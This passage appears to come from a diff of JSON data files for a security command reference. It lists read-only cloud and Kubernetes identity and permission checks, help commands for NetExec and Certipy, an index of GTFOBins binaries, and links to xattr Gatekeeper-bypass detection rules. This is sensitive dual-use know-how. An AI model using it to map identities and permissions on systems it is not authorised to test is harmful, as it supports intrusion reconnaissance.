Xattr","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml"},{"type":"Jamf Protect: Detect activity related to xattr and extended attributes","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/xattr_extended_attributes_activity"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/xattr.yml","https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf","https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be"],"requires":[],"services":[],"aliases":[]},{"id":"daemon:reference:aws-identity","toolId":"daemon:aws","toolName":"aws","name":"Identify the active AWS principal","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["AWS"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"aws sts get-caller-identity --profile 'lab'","template":{"command":"aws sts get-caller-identity --profile {{profile}}","shell":"posix","variables":[{"key":"profile","label":"AWS profile","default":"lab"}]},"description":"Returns the account ID, ARN and user ID for the credentials selected by this profile.","expected":"Returns the account ID, ARN and user ID for the credentials selected by this profile.","troubleshooting":"ExpiredToken or InvalidClientTokenId means the selected credentials need refreshing. Check the profile before interpreting identity results.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Authenticated CLI session"],"mitre":[],"references":["https://docs.aws.amazon.com/cli/latest/reference/sts/get-caller-identity.html"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:aws-config","toolId":"daemon:aws","toolName":"aws","name":"Inspect AWS configuration sources","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["AWS"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"aws configure list --profile 'lab'","template":{"command":"aws configure list --profile {{profile}}","shell":"posix","variables":[{"key":"profile","label":"AWS profile","default":"lab"}]},"description":"Shows resolved configuration and where each value comes from; credentials are masked.","expected":"Shows resolved configuration and where each value comes from; credentials are masked.","troubleshooting":"Environment variables can override profile configuration. Check the source column.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Authenticated CLI session"],"mitre":[],"references":["https://docs.aws.amazon.com/cli/latest/reference/configure/list.html"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:aws-regions","toolId":"daemon:aws","toolName":"aws","name":"List enabled AWS regions","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["AWS"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"aws ec2 describe-regions --profile 'lab' --region 'eu-west-2'","template":{"command":"aws ec2 describe-regions --profile {{profile}} --region {{region}}","shell":"posix","variables":[{"key":"profile","label":"AWS profile","default":"lab"},{"key":"region","label":"Region","default":"eu-west-2"}]},"description":"Returns enabled region names and endpoints.","expected":"Returns enabled region names and endpoints.","troubleshooting":"Requires ec2:DescribeRegions. A denied request is not evidence that no regions exist.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Authenticated CLI session"],"mitre":[],"references":["https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-regions.html"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:azure-account","toolId":"daemon:az","toolName":"az","name":"Inspect the active Azure subscription","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Azure"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"az account show --output json","description":"Shows the active subscription, tenant and account.","expected":"Shows the active subscription, tenant and account.","troubleshooting":"Run the authorised sign-in workflow if the CLI has no current account.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Authenticated CLI session"],"mitre":[],"references":["https://learn.microsoft.com/en-us/cli/azure/account?view=azure-cli-latest#az-account-show"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:azure-subscriptions","toolId":"daemon:az","toolName":"az","name":"List accessible Azure subscriptions","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Azure"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"az account list --output table","description":"Shows subscriptions available to the current account.","expected":"Shows subscriptions available to the current account.","troubleshooting":"A subscription list does not establish permissions on its resources.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Authenticated CLI session"],"mitre":[],"references":["https://learn.microsoft.com/en-us/cli/azure/account?view=azure-cli-latest#az-account-list"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:gcp-projects","toolId":"daemon:gcloud","toolName":"gcloud","name":"List accessible GCP projects","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["GCP"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"gcloud projects list --format=json","description":"Lists visible projects for the active account.","expected":"Lists visible projects for the active account.","troubleshooting":"Service-account principal-set grants may not appear in this listing.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Authenticated CLI session"],"mitre":[],"references":["https://cloud.google.com/sdk/gcloud/reference/projects/list"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:gcp-config","toolId":"daemon:gcloud","toolName":"gcloud","name":"Inspect the active gcloud configuration","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["GCP"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"gcloud config list","description":"Shows configured account, project and other properties.","expected":"Shows configured account, project and other properties.","troubleshooting":"Configured properties do not prove that the account has access to the selected project.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Authenticated CLI session"],"mitre":[],"references":["https://cloud.google.com/sdk/gcloud/reference/config/list"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:gcp-policy","toolId":"daemon:gcloud","toolName":"gcloud","name":"Read a project IAM policy","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["GCP"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"gcloud projects get-iam-policy 'lab-project' --format=json","template":{"command":"gcloud projects get-iam-policy {{project}} --format=json","shell":"posix","variables":[{"key":"project","label":"GCP project","default":"lab-project"}]},"description":"Shows policy bindings visible to the current account.","expected":"Shows policy bindings visible to the current account.","troubleshooting":"Requires resourcemanager.projects.getIamPolicy; inherited grants need separate review.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Authenticated CLI session"],"mitre":[],"references":["https://cloud.google.com/sdk/gcloud/reference/projects/get-iam-policy"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:kube-context","toolId":"daemon:kubectl","toolName":"kubectl","name":"Check the current Kubernetes context","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Containers"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"kubectl config current-context","description":"Prints the selected kubeconfig context without contacting the cluster.","expected":"Prints the selected kubeconfig context without contacting the cluster.","troubleshooting":"An unset current context must be selected before cluster queries.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Kubeconfig"],"mitre":[],"references":["https://kubernetes.io/docs/reference/kubectl/generated/kubectl_config/kubectl_config_current-context/"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:kube-contexts","toolId":"daemon:kubectl","toolName":"kubectl","name":"List kubeconfig contexts","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Containers"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"kubectl config get-contexts","description":"Shows configured clusters, identities and namespaces.","expected":"Shows configured clusters, identities and namespaces.","troubleshooting":"This lists local configuration, not proof of cluster connectivity or permission.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Kubeconfig"],"mitre":[],"references":["https://kubernetes.io/docs/reference/kubectl/generated/kubectl_config/kubectl_config_get-contexts/"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:kube-permissions","toolId":"daemon:kubectl","toolName":"kubectl","name":"Review permissions in a namespace","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Containers"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"kubectl auth can-i --list --namespace 'default'","template":{"command":"kubectl auth can-i --list --namespace {{namespace}}","shell":"posix","variables":[{"key":"namespace","label":"Namespace","default":"default"}]},"description":"Returns the server-reported rules for the active identity in this namespace.","expected":"Returns the server-reported rules for the active identity in this namespace.","troubleshooting":"Some authorizers cannot enumerate every rule. Check a specific verb/resource when the list is incomplete.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Kubeconfig"],"mitre":[],"references":["https://kubernetes.io/docs/reference/kubectl/generated/kubectl_auth/kubectl_auth_can-i/"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:kube-pod-permission","toolId":"daemon:kubectl","toolName":"kubectl","name":"Check permission to list pods","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Containers"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"kubectl auth can-i list pods --namespace 'default'","template":{"command":"kubectl auth can-i list pods --namespace {{namespace}}","shell":"posix","variables":[{"key":"namespace","label":"Namespace","default":"default"}]},"description":"Returns yes or no for this particular action.","expected":"Returns yes or no for this particular action.","troubleshooting":"The selected context and namespace determine which identity and resources are checked.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":["Kubeconfig"],"mitre":[],"references":["https://kubernetes.io/docs/reference/kubectl/generated/kubectl_auth/kubectl_auth_can-i/"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:nxc-modules","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"List available SMB modules","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Active Directory"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"nxc smb -L","description":"Lists modules supported by the installed NetExec version.","expected":"Lists modules supported by the installed NetExec version.","troubleshooting":"Module names and options vary by release. Inspect module help before using a module.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":[],"mitre":[],"references":["https://www.netexec.wiki/getting-started/using-modules"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:nxc-module-options","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"Inspect options for an SMB module","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Active Directory"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"nxc smb -M 'spider_plus' --options","template":{"command":"nxc smb -M {{module}} --options","shell":"posix","variables":[{"key":"module","label":"Module","default":"spider_plus"}]},"description":"Shows the selected module options.","expected":"Shows the selected module options.","troubleshooting":"This is module help, not a module run. Use the spelling reported by nxc smb -L.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":[],"mitre":[],"references":["https://www.netexec.wiki/getting-started/using-modules"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:nxc-help","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"Inspect SMB authentication and connection options","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Active Directory"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"nxc smb --help","description":"Shows flags supported by the installed SMB protocol implementation.","expected":"Shows flags supported by the installed SMB protocol implementation.","troubleshooting":"Use protocol-specific help because supported flags differ by protocol and version.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":[],"mitre":[],"references":["https://www.netexec.wiki/getting-started/selecting-and-using-a-protocol"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:certipy-find-help","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Inspect certificate discovery options","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Active Directory"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"certipy find -h","description":"Shows discovery, output and authentication options for the installed Certipy release.","expected":"Shows discovery, output and authentication options for the installed Certipy release.","troubleshooting":"Compare your installed release with the wiki before adapting an older example.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":[],"mitre":[],"references":["https://github.com/ly4k/Certipy/wiki/08-%E2%80%90-Command-Reference"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]},{"id":"daemon:reference:certipy-version-help","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Inspect Certipy commands and version banner","source":"DAEMON","platform":["Linux","Windows","macOS"],"environment":["Active Directory"],"capability":["Discovery"],"nativeCategory":["Configuration and verification"],"command":"certipy -h","description":"Shows the installed command set and version banner.","expected":"Shows the installed command set and version banner.","troubleshooting":"The AD CS conditions behind an ESC label matter as much as CLI syntax; consult the linked official guide.","sideEffects":"No intentional configuration changes. Remote reads may generate audit events.","compatibility":"Examples use POSIX shell quoting. Consult installed tool help for version-specific options.","requires":[],"mitre":[],"references":["https://github.com/ly4k/Certipy/wiki"],"availability":"Installed tool","verification":"Documentation checked","reviewedAt":"2026-10-04","added":true,"services":[],"aliases":[]}] diff --git a/src/data/tools.json b/src/data/tools.json @@ -1 +1 @@ -[{"id":"gtfo:7z","name":"7z","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/7z/"],"count":2},{"id":"gtfo:R","name":"R","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/R/"],"count":3},{"id":"gtfo:aa-exec","name":"aa-exec","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aa-exec/"],"count":3},{"id":"gtfo:ab","name":"ab","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ab/"],"count":6},{"id":"gtfo:acr","name":"acr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/acr/"],"count":3},{"id":"gtfo:agetty","name":"agetty","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/agetty/"],"count":1},{"id":"gtfo:alpine","name":"alpine","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/alpine/"],"count":3},{"id":"gtfo:ansible-playbook","name":"ansible-playbook","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ansible-playbook/"],"count":2},{"id":"gtfo:ansible-test","name":"ansible-test","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ansible-test/"],"count":2},{"id":"gtfo:aoss","name":"aoss","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aoss/"],"count":2},{"id":"gtfo:apache2","name":"apache2","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/apache2/"],"count":6},{"id":"gtfo:apache2ctl","name":"apache2ctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/apache2ctl/"],"count":2},{"id":"gtfo:apport-cli","name":"apport-cli","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/apport-cli/"],"count":1},{"id":"gtfo:apt-get","name":"apt-get","source":"GTFOBins","platform":["Linux"],"aliases":["apt"],"references":["https://gtfobins.github.io/gtfobins/apt-get/"],"count":6},{"id":"gtfo:aptitude","name":"aptitude","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aptitude/"],"count":2},{"id":"gtfo:ar","name":"ar","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ar/"],"count":3},{"id":"gtfo:arch-nspawn","name":"arch-nspawn","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/arch-nspawn/"],"count":1},{"id":"gtfo:aria2c","name":"aria2c","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aria2c/"],"count":12},{"id":"gtfo:arj","name":"arj","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/arj/"],"count":6},{"id":"gtfo:arp","name":"arp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/arp/"],"count":3},{"id":"gtfo:as","name":"as","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/as/"],"count":3},{"id":"gtfo:ascii-xfr","name":"ascii-xfr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ascii-xfr/"],"count":3},{"id":"gtfo:ascii85","name":"ascii85","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ascii85/"],"count":2},{"id":"gtfo:ash","name":"ash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ash/"],"count":6},{"id":"gtfo:aspell","name":"aspell","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aspell/"],"count":6},{"id":"gtfo:asterisk","name":"asterisk","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/asterisk/"],"count":3},{"id":"gtfo:at","name":"at","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/at/"],"count":4},{"id":"gtfo:atobm","name":"atobm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/atobm/"],"count":3},{"id":"gtfo:autoconf","name":"autoconf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/autoconf/"],"count":2},{"id":"gtfo:autoheader","name":"autoheader","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/autoheader/"],"count":2},{"id":"gtfo:autoreconf","name":"autoreconf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/autoreconf/"],"count":2},{"id":"gtfo:aws","name":"aws","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/aws/"],"count":5},{"id":"gtfo:base32","name":"base32","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/base32/"],"count":3},{"id":"gtfo:base58","name":"base58","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/base58/"],"count":2},{"id":"gtfo:base64","name":"base64","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/base64/"],"count":3},{"id":"gtfo:basenc","name":"basenc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/basenc/"],"count":3},{"id":"gtfo:basez","name":"basez","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/basez/"],"count":3},{"id":"gtfo:bash","name":"bash","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["ksh"],"references":["https://gtfobins.github.io/gtfobins/bash/"],"count":33},{"id":"gtfo:bashbug","name":"bashbug","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bashbug/"],"count":2},{"id":"gtfo:batcat","name":"batcat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/batcat/"],"count":3},{"id":"gtfo:bbot","name":"bbot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bbot/"],"count":2},{"id":"gtfo:bc","name":"bc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bc/"],"count":3},{"id":"gtfo:bconsole","name":"bconsole","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bconsole/"],"count":5},{"id":"gtfo:bee","name":"bee","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bee/"],"count":3},{"id":"gtfo:borg","name":"borg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/borg/"],"count":2},{"id":"gtfo:bpftrace","name":"bpftrace","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bpftrace/"],"count":3},{"id":"gtfo:bridge","name":"bridge","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bridge/"],"count":3},{"id":"gtfo:bundle","name":"bundle","source":"GTFOBins","platform":["Linux"],"aliases":["bundler"],"references":["https://gtfobins.github.io/gtfobins/bundle/"],"count":10},{"id":"gtfo:busctl","name":"busctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/busctl/"],"count":9},{"id":"gtfo:busybox","name":"busybox","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/busybox/"],"count":8},{"id":"gtfo:byebug","name":"byebug","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/byebug/"],"count":2},{"id":"gtfo:bzip2","name":"bzip2","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/bzip2/"],"count":3},{"id":"gtfo:cabal","name":"cabal","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cabal/"],"count":3},{"id":"gtfo:cancel","name":"cancel","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cancel/"],"count":3},{"id":"gtfo:capsh","name":"capsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/capsh/"],"count":3},{"id":"gtfo:cargo","name":"cargo","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cargo/"],"count":2},{"id":"gtfo:cat","name":"cat","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cat/"],"count":3},{"id":"gtfo:cdist","name":"cdist","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cdist/"],"count":2},{"id":"gtfo:certbot","name":"certbot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/certbot/"],"count":2},{"id":"gtfo:chattr","name":"chattr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chattr/"],"count":2},{"id":"gtfo:check_by_ssh","name":"check_by_ssh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_by_ssh/"],"count":2},{"id":"gtfo:check_cups","name":"check_cups","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_cups/"],"count":2},{"id":"gtfo:check_log","name":"check_log","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_log/"],"count":4},{"id":"gtfo:check_memory","name":"check_memory","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_memory/"],"count":2},{"id":"gtfo:check_raid","name":"check_raid","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_raid/"],"count":2},{"id":"gtfo:check_ssl_cert","name":"check_ssl_cert","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_ssl_cert/"],"count":2},{"id":"gtfo:check_statusfile","name":"check_statusfile","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/check_statusfile/"],"count":2},{"id":"gtfo:chmod","name":"chmod","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chmod/"],"count":2},{"id":"gtfo:choom","name":"choom","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/choom/"],"count":3},{"id":"gtfo:chown","name":"chown","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chown/"],"count":2},{"id":"gtfo:chroot","name":"chroot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chroot/"],"count":2},{"id":"gtfo:chrt","name":"chrt","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/chrt/"],"count":3},{"id":"gtfo:clamscan","name":"clamscan","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/clamscan/"],"count":3},{"id":"gtfo:clisp","name":"clisp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/clisp/"],"count":3},{"id":"gtfo:cmake","name":"cmake","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cmake/"],"count":4},{"id":"gtfo:cmp","name":"cmp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cmp/"],"count":3},{"id":"gtfo:cobc","name":"cobc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cobc/"],"count":3},{"id":"gtfo:code","name":"code","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/code/"],"count":6},{"id":"gtfo:codex","name":"codex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/codex/"],"count":2},{"id":"gtfo:column","name":"column","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/column/"],"count":3},{"id":"gtfo:comm","name":"comm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/comm/"],"count":3},{"id":"gtfo:composer","name":"composer","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/composer/"],"count":2},{"id":"gtfo:cowsay","name":"cowsay","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cowsay/"],"count":2},{"id":"gtfo:cowthink","name":"cowthink","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cowthink/"],"count":2},{"id":"gtfo:cp","name":"cp","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cp/"],"count":10},{"id":"gtfo:cpan","name":"cpan","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cpan/"],"count":2},{"id":"gtfo:cpio","name":"cpio","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cpio/"],"count":10},{"id":"gtfo:cpulimit","name":"cpulimit","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cpulimit/"],"count":3},{"id":"gtfo:crash","name":"crash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/crash/"],"count":5},{"id":"gtfo:crontab","name":"crontab","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/crontab/"],"count":4},{"id":"gtfo:csh","name":"csh","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/csh/"],"count":6},{"id":"gtfo:csplit","name":"csplit","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/